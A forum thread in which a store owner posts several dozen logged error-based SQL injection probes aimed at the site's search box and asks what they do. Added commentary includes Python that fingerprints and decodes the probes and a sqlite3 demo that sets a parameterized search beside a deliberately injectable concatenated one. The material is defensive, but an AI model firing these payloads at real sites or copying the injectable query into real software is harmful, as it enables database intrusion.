SQL Injection in Store Search

This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
9 years ago
Hi Guys,

Since early this morning, we have been getting the following search queries from our stores. I understand it's SQL injection and have added a max length check and logic to detect SQL injection and prevent it from reaching the SQL server.

But I just wanted to know what the person searching is trying to understand/study. Is it safe to ignore?

The search terms are given below. "Enter Model Number or Cartridge Code" is the default text of our search text box. The IP is supposed to be German.

Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170

Enter Model Number or Cartridge Code%' AND 4911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(104)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4911=4911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(113)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 9729=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113)||(SELECT (CASE WHEN (9729=9729) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code%' AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='

Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP

Enter Model Number or Cartridge Code') AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND ('SdsF'='SdsF

Enter Model Number or Cartridge Code' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND 'cvvd'='cvvd

Enter Model Number or Cartridge Code' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND 'zIAo'='zIAo

Enter Model Number or Cartridge Code') AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND ('lukU'='lukU

Enter Model Number or Cartridge Code' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND 'gvys'='gvys

Enter Model Number or Cartridge Code) AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND (9658=9658

Enter Model Number or Cartridge Code) AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND (2502=2502

Enter Model Number or Cartridge Code%' AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 6528 FROM(SELECT COUNT(*),CONCAT(0x7178696e71,(SELECT (CASE WHEN (6528=6528) THEN 1 ELSE 0 END)),0x71776a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND (SELECT 9422 FROM(SELECT COUNT(*),CONCAT(0x7171686a71,(SELECT (CASE WHEN (9422=9422) THEN 1 ELSE 0 END)),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

Enter Model Number or Cartridge Code%' AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113))) AND '%'='

Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))-- ZgIZ

Enter Model Number or Cartridge Code' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND 'CJnu'='CJnu

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))-- PYgY

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))-- TXpN

Enter Model Number or Cartridge Code) AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND (8167=8167

Enter Model Number or Cartridge Code%' AND 9841=CAST((CHR(113)||CHR(120)||CHR(105)||CHR(110)||CHR(113))||(SELECT (CASE WHEN (9841=9841) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(106)||CHR(122)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code%' AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND '%'='

Enter Model Number or Cartridge Code AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6651=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(105)+CHAR(110)+CHAR(113)+(SELECT (CASE WHEN (6651=6651) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(106)+CHAR(122)+CHAR(113)))

Enter Model Number or Cartridge Code AND 4201=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(97)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4201=4201) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(99)+CHAR(121)+CHAR(113)))

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)-- CuDa

Enter Model Number or Cartridge Code AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC)
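The terms above all share one shape: a comparison that is always true, CASE WHEN (n=n), wrapped in a type conversion that the database cannot perform, with a fixed marker string spelled out through CHR()/CHAR() calls or hex literals. The conversion is meant to fail and the marker is meant to show up inside the resulting error message, which tells the sender both that their input reached the database and which database it is. The following Python is an added example (not part of the post and not nopCommerce code) that runs simple triage logic over four of the logged terms, copied from the post, plus two constructed ordinary searches. It flags the tautology, identifies the dialect each variant targets (Oracle XMLType/DUAL, SQL Server CONVERT/CHAR, MySQL FLOOR(RAND(0)*2) ... GROUP BY, PostgreSQL CAST ... ::text) and decodes the marker. The rule names, regular expressions and the SAMPLE_SEARCH_TERMS list are my own construction.

```python
import re

# Constructed sample: four of the search terms quoted in the post (one per
# database dialect the probes target) plus two ordinary searches for contrast.
SAMPLE_SEARCH_TERMS = [
    "Enter Model Number or Cartridge Code) AND 2895=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2895=2895) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)||CHR(62))) FROM DUAL) AND (9170=9170",
    "Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113))) AND ('KzHP'='KzHP",
    "Enter Model Number or Cartridge Code%' AND (SELECT 2396 FROM(SELECT COUNT(*),CONCAT(0x7170617a71,(SELECT (CASE WHEN (2396=2396) THEN 1 ELSE 0 END)),0x7177637971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='",
    "Enter Model Number or Cartridge Code') AND 6442=CAST((CHR(113)||CHR(112)||CHR(97)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (6442=6442) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(119)||CHR(99)||CHR(121)||CHR(113)) AS NUMERIC) AND ('iWJF'='iWJF",
    "HP 304A",
    "CF210A cartridge",
]

# CASE WHEN (n=n) with the same number on both sides: always true, but it still
# forces the database to evaluate the surrounding (failing) type conversion.
TAUTOLOGY = re.compile(r"CASE\s+WHEN\s*\(\s*(\d+)\s*=\s*\1\s*\)", re.I)

# Dialect-specific constructs visible in the logged terms (rule names are mine).
DIALECT_RULES = [
    ("Oracle", re.compile(r"XMLType\s*\(|FROM\s+DUAL\b", re.I)),
    ("MSSQL", re.compile(r"CONVERT\s*\(\s*INT\s*,|CHAR\(\d+\)\+CHAR\(", re.I)),
    ("MySQL", re.compile(r"FLOOR\s*\(\s*RAND\s*\(0\)\s*\*\s*2\s*\)|INFORMATION_SCHEMA\.CHARACTER_SETS", re.I)),
    ("PostgreSQL", re.compile(r"::text\b|CAST\s*\(.*AS\s+NUMERIC\s*\)", re.I)),
]

CHAR_CALL = re.compile(r"\b(?:CHR|CHAR)\s*\(\s*(\d+)\s*\)", re.I)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def decode_marker(term):
    """Recover the text the probe spells out with CHR()/CHAR() calls or 0x hex.
    Error-based probes wrap their result in a fixed 'quote marker' (the q...q
    strings) so the sender can locate it inside a reflected database error."""
    chars = [chr(int(c)) for c in CHAR_CALL.findall(term) if 32 <= int(c) < 127]
    if chars:
        return "".join(chars)
    hexes = [h for h in HEX_LITERAL.findall(term) if len(h) % 2 == 0]
    return "".join(bytes.fromhex(h).decode("ascii", "replace") for h in hexes)


def classify(term):
    """Describe one search term: does it look like an error-based SQLi probe,
    which back-end dialect does it target, and which marker does it carry?"""
    dialects = [name for name, rule in DIALECT_RULES if rule.search(term)]
    tautology = bool(TAUTOLOGY.search(term))
    return {
        "suspicious": tautology and bool(dialects),
        "tautology": tautology,
        "dialects": dialects,
        "marker": decode_marker(term),
    }


def probed_dialects(terms):
    """Count how many suspicious terms target each dialect. The same marker sent
    in several dialects means the sender does not know the back-end and is
    trying each in turn, fingerprinting the database from whichever one errors."""
    counts = {}
    for term in terms:
        info = classify(term)
        if not info["suspicious"]:
            continue
        for name in info["dialects"]:
            counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for term in SAMPLE_SEARCH_TERMS:
        info = classify(term)
        print(info["suspicious"], info["dialects"], repr(info["marker"]), term[:45])
    print(probed_dialects(SAMPLE_SEARCH_TERMS))
```

Run over the full list in the post, the dialect counts come out spread across all four back-ends with the same handful of markers, which answers the question of what is being studied: the sender is checking whether search input reaches the database as SQL, and trying to learn which database it is from an error message. A store that binds the search term as a parameter and does not echo database errors gives both questions no answer, so the logged terms are noise worth alerting on but not evidence of a breach.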
9 years ago
Hi Jey,

No worries. nopCommerce is not vulnerable to SQL injection. Ignore these hack attempts.
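The reply's reassurance rests on how the search term reaches the database: as a bound parameter it is a string value the database never parses as SQL, so nothing in it can change the statement. As an added illustration (my code, not nopCommerce's, using Python's sqlite3 module against a constructed in-memory product table), the following runs one of the logged probes through a parameterized LIKE search, where it simply matches no product, and through a concatenated search, where the probe's closing quote ends the string literal and the rest breaks the statement with a database error, the very signal an error-based probe is looking for. The product codes, table layout and function names are constructed.

```python
import sqlite3

# Constructed in-memory catalogue standing in for the store's product table.
CATALOGUE = [
    ("CE285A", "HP 85A Black toner cartridge"),
    ("CF210A", "HP 131A Black toner cartridge"),
    ("TN-2420", "Brother TN-2420 toner cartridge"),
]

# One of the logged search terms from the post above, verbatim.
PROBE = ("Enter Model Number or Cartridge Code') AND 3733=CONVERT(INT,(SELECT CHAR(113)"
         "+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3733=3733) THEN "
         "CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(107)+CHAR(113)))"
         " AND ('KzHP'='KzHP")

LIKE_ESCAPE = "\\"


def open_catalogue():
    """Create and populate the sample table (constructed data, not store data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (code TEXT, name TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", CATALOGUE)
    conn.commit()
    return conn


def escape_like(term):
    """Escape the LIKE wildcards so a '%' or '_' typed by the user matches
    literally instead of widening the search (a separate issue from injection)."""
    return (term.replace(LIKE_ESCAPE, LIKE_ESCAPE * 2)
                .replace("%", LIKE_ESCAPE + "%")
                .replace("_", LIKE_ESCAPE + "_"))


def search_parameterized(conn, term):
    """Hardened search: the term is passed as a bound parameter. The database
    receives it as a string value, never as SQL text, so the quote, parentheses
    and CONVERT() in the probe are just characters that match no product."""
    pattern = "%" + escape_like(term) + "%"
    rows = conn.execute(
        "SELECT code FROM product "
        "WHERE code LIKE ? ESCAPE '\\' OR name LIKE ? ESCAPE '\\' "
        "ORDER BY code",
        (pattern, pattern),
    ).fetchall()
    return [code for (code,) in rows]


def search_concatenated(conn, term):
    """Injectable search, shown for contrast only: the term is spliced into the
    SQL text, so the quote inside the probe ends the literal and the remainder
    is parsed as SQL. On SQLite that is a syntax error, which is the kind of
    database error an error-based probe hopes to see reflected in the page."""
    sql = ("SELECT code FROM product WHERE code LIKE '%" + term + "%' "
           "OR name LIKE '%" + term + "%' ORDER BY code")
    return [code for (code,) in conn.execute(sql).fetchall()]


def concatenated_search_raises(conn, term):
    """True if the injectable search fails with a database error for this term."""
    try:
        search_concatenated(conn, term)
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    conn = open_catalogue()
    print(search_parameterized(conn, "toner"))       # all three codes
    print(search_parameterized(conn, PROBE))         # [] with no error
    print(concatenated_search_raises(conn, PROBE))   # True
```

The max-length check and pattern filter mentioned in the question are reasonable defence in depth and a useful alerting signal, but they are not what makes these probes inert; binding the parameter is, together with returning a generic error page rather than the database's message. The wildcard escaping in escape_like is unrelated to injection and is there only because a catalogue search built on LIKE would otherwise treat a typed '%' as match-anything.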